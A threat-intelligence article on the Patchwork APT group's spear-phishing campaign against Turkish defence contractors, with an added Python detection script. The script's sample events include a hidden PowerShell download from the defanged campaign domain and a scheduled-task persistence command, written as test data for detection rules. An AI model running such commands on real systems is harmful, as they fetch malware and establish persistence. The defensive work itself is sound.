Patchwork APT Group Targets Turkish Defense Firms with Sophisticated Spear-Phishing Campaigns

The advanced persistent threat (APT) group known as Patchwork has initiated a targeted cyber-espionage campaign against Turkish defense contractors, aiming to collect strategic intelligence. This operation employs a multi-stage attack sequence initiated through malicious Windows shortcut (LNK) files, which are cleverly disguised as invitations to conferences on unmanned vehicle systems.

Arctic Wolf Labs, a cybersecurity research firm, detailed this campaign in a recent technical report. The report highlights that the attack chain comprises five distinct stages, beginning with the delivery of the deceptive LNK files. These files, when executed, trigger PowerShell commands designed to retrieve additional malicious payloads from an external server. Notably, the server in question, expouav[.]org, was registered on June 25, 2025, and hosts a PDF document that mimics an international conference on unmanned vehicle systems. This document serves as a visual decoy to distract the user while the malicious processes execute in the background.

The timing and focus of this campaign suggest a geopolitical motive. It coincides with the strengthening defense collaboration between Pakistan and Türkiye, as well as recent military tensions between India and Pakistan. Given that Patchwork is believed to be an Indian state-sponsored entity, these factors indicate a strategic intent behind the cyber-attacks.

Background on Patchwork APT Group

Patchwork, also referred to by aliases such as APT-C-09, APT-Q-36, Chinastrats, Dropping Elephant, Operation Hangover, Quilted Tiger, and Zinc Emerson, has been active since at least 2009. The group is known for targeting entities in China, Pakistan, and other South Asian countries. Their operations have historically focused on cyber-espionage, aiming to gather sensitive information from government agencies, research institutions, and defense contractors.

In July 2024, the Knownsec 404 Team documented Patchwork’s activities targeting entities associated with Bhutan. The group utilized the Brute Ratel C4 framework and an updated version of a backdoor known as PGoShell in these attacks. Since early 2025, Patchwork has been linked to various campaigns against Chinese universities, employing lures related to power grids to deploy a Rust-based loader. This loader decrypts and launches a C# trojan named Protego, which is designed to harvest extensive information from compromised Windows systems.

In May 2025, Chinese cybersecurity firm QiAnXin reported infrastructure overlaps between Patchwork and another threat group known as DoNot Team (also referred to as APT-Q-38 or Bellyworm). This suggests potential operational connections between the two groups, indicating a broader network of coordinated cyber-espionage activities.

Details of the Turkish Defense Firms Campaign

The recent campaign targeting Turkish defense firms marks an expansion of Patchwork’s operational scope. The attack begins with phishing emails containing malicious LNK files. When a recipient opens the LNK file, it executes embedded PowerShell commands that initiate the download of additional payloads from the expouav[.]org domain.

The downloaded payloads include a PDF document that serves as a decoy, displaying information about a legitimate conference on unmanned vehicle systems. This tactic is designed to maintain the user’s attention while the malicious components execute in the background. One of these components is a malicious DLL file, which is launched using DLL side-loading through a scheduled task. This leads to the execution of shellcode that performs comprehensive reconnaissance of the infected system, including capturing screenshots and exfiltrating data back to the attacker’s server.
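The chain described above leaves a recognisable trail in endpoint telemetry: Explorer starting PowerShell that fetches content from the web, followed by a scheduled task whose action lives in a user-writable folder (where a dropped DLL can be side-loaded). The detection logic below is an added example, not code from Arctic Wolf Labs or the report; the Sysmon-style events, rule names and URL path are constructed, and only the expouav[.]org domain comes from the report.

```python
import re

# Constructed Sysmon-style process-creation events (not real telemetry from the
# campaign). They model the described chain: an LNK opened from Explorer runs
# PowerShell that fetches a payload, then a scheduled task launches a binary
# from a user-writable directory where a side-loaded DLL would sit.
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'powershell.exe -w hidden -c "iwr https://expouav[.]org/PLACEHOLDER_PATH -OutFile $env:TEMP\x"'},
    {"parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": r'schtasks.exe /create /sc minute /mo 5 /tn Updater /tr "C:\Users\Public\Libraries\legit.exe"'},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -File C:\Scripts\inventory.ps1"},  # benign admin script
]

# Directories a standard user can write to; tasks pointing here deserve a look.
USER_WRITABLE = re.compile(r"\\(Users\\[^\\]+\\AppData|Users\\Public|ProgramData|Windows\\Temp)\\", re.I)
DOWNLOAD_CUES = re.compile(r"(invoke-webrequest|\biwr\b|downloadfile|downloadstring|net\.webclient|start-bitstransfer|\bcurl\b)", re.I)
HIDDEN_CUES = re.compile(r"-w(indowstyle)?\s+hidden|-enc(odedcommand)?\b", re.I)


def flag_event(ev):
    """Return the names of the rules that match one process-creation event."""
    hits = []
    image = ev["image"].lower()
    cmd = ev["cmdline"]
    # Rule 1: PowerShell started directly by Explorer (how an LNK target is
    # launched) that downloads content; a hidden window is a second signal.
    if ev["parent"].lower().endswith(r"\explorer.exe") and image.endswith("powershell.exe"):
        if DOWNLOAD_CUES.search(cmd):
            hits.append("explorer->powershell download")
            if HIDDEN_CUES.search(cmd):
                hits.append("hidden powershell window")
    # Rule 2: scheduled task whose action is in a user-writable directory,
    # the precondition for DLL side-loading from a dropped folder.
    if image.endswith("schtasks.exe") and re.search(r"/create", cmd, re.I):
        m = re.search(r'/tr\s+"?([^"]+)', cmd, re.I)
        if m and USER_WRITABLE.search(m.group(1)):
            hits.append("schtasks action in user-writable path")
    return hits


def scan(events):
    """Return (index, rule hits) for every event that triggers at least one rule."""
    flagged = [(i, flag_event(ev)) for i, ev in enumerate(events)]
    return [(i, hits) for i, hits in flagged if hits]
```

Either rule alone is noisy in an admin-heavy environment; correlating the two on one host within a short window is what makes the alert worth a human's time.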

Arctic Wolf Labs notes that this campaign represents a significant evolution in Patchwork’s capabilities. The group has transitioned from using x64 DLL variants observed in November 2024 to the current x86 PE executables with enhanced command structures. This progression indicates a continuous refinement of their attack methodologies to evade detection and improve the effectiveness of their operations.

Geopolitical Context and Implications

The targeting of Turkish defense firms by Patchwork is particularly noteworthy given Türkiye’s prominent position in the global defense industry. Türkiye commands 65% of the global unmanned aerial vehicle (UAV) export market and is actively developing critical hypersonic missile capabilities. Additionally, Türkiye has been strengthening its defense ties with Pakistan during a period of heightened tensions between India and Pakistan.

These factors suggest that Patchwork’s campaign is not merely opportunistic but strategically aligned with broader geopolitical objectives. By targeting Turkish defense contractors, the group aims to gather intelligence that could influence regional power dynamics and inform national security strategies.

Recommendations for Defense Contractors

Given the sophisticated nature of Patchwork’s tactics, defense contractors and related organizations should implement robust cybersecurity measures to mitigate the risk of such attacks. Recommended actions include:

1. Employee Training and Awareness: Conduct regular training sessions to educate employees about the dangers of spear-phishing and the importance of scrutinizing unsolicited emails, especially those containing attachments or links.

2. Email Filtering and Monitoring: Deploy advanced email filtering solutions to detect and block phishing attempts. Monitor email traffic for signs of malicious activity.

3. Endpoint Protection: Utilize endpoint detection and response (EDR) solutions to identify and mitigate malicious activities on user devices.

4. Regular Software Updates: Ensure that all systems and software are up to date with the latest security patches to prevent exploitation of known vulnerabilities.

5. Network Segmentation: Implement network segmentation to limit the spread of malware within the organization.

6. Incident Response Planning: Develop and regularly update an incident response plan to ensure a swift and effective response to potential security breaches.

By adopting these measures, organizations can enhance their resilience against sophisticated cyber threats like those posed by the Patchwork APT group.

Conclusion

The recent spear-phishing campaign by Patchwork targeting Turkish defense firms underscores the evolving nature of cyber-espionage threats. The group’s use of multi-stage attack chains, deceptive lures, and advanced payloads highlights the need for continuous vigilance and proactive cybersecurity practices. As geopolitical tensions influence cyber operations, organizations in the defense sector must remain alert to the persistent and adaptive threats posed by state-sponsored actors.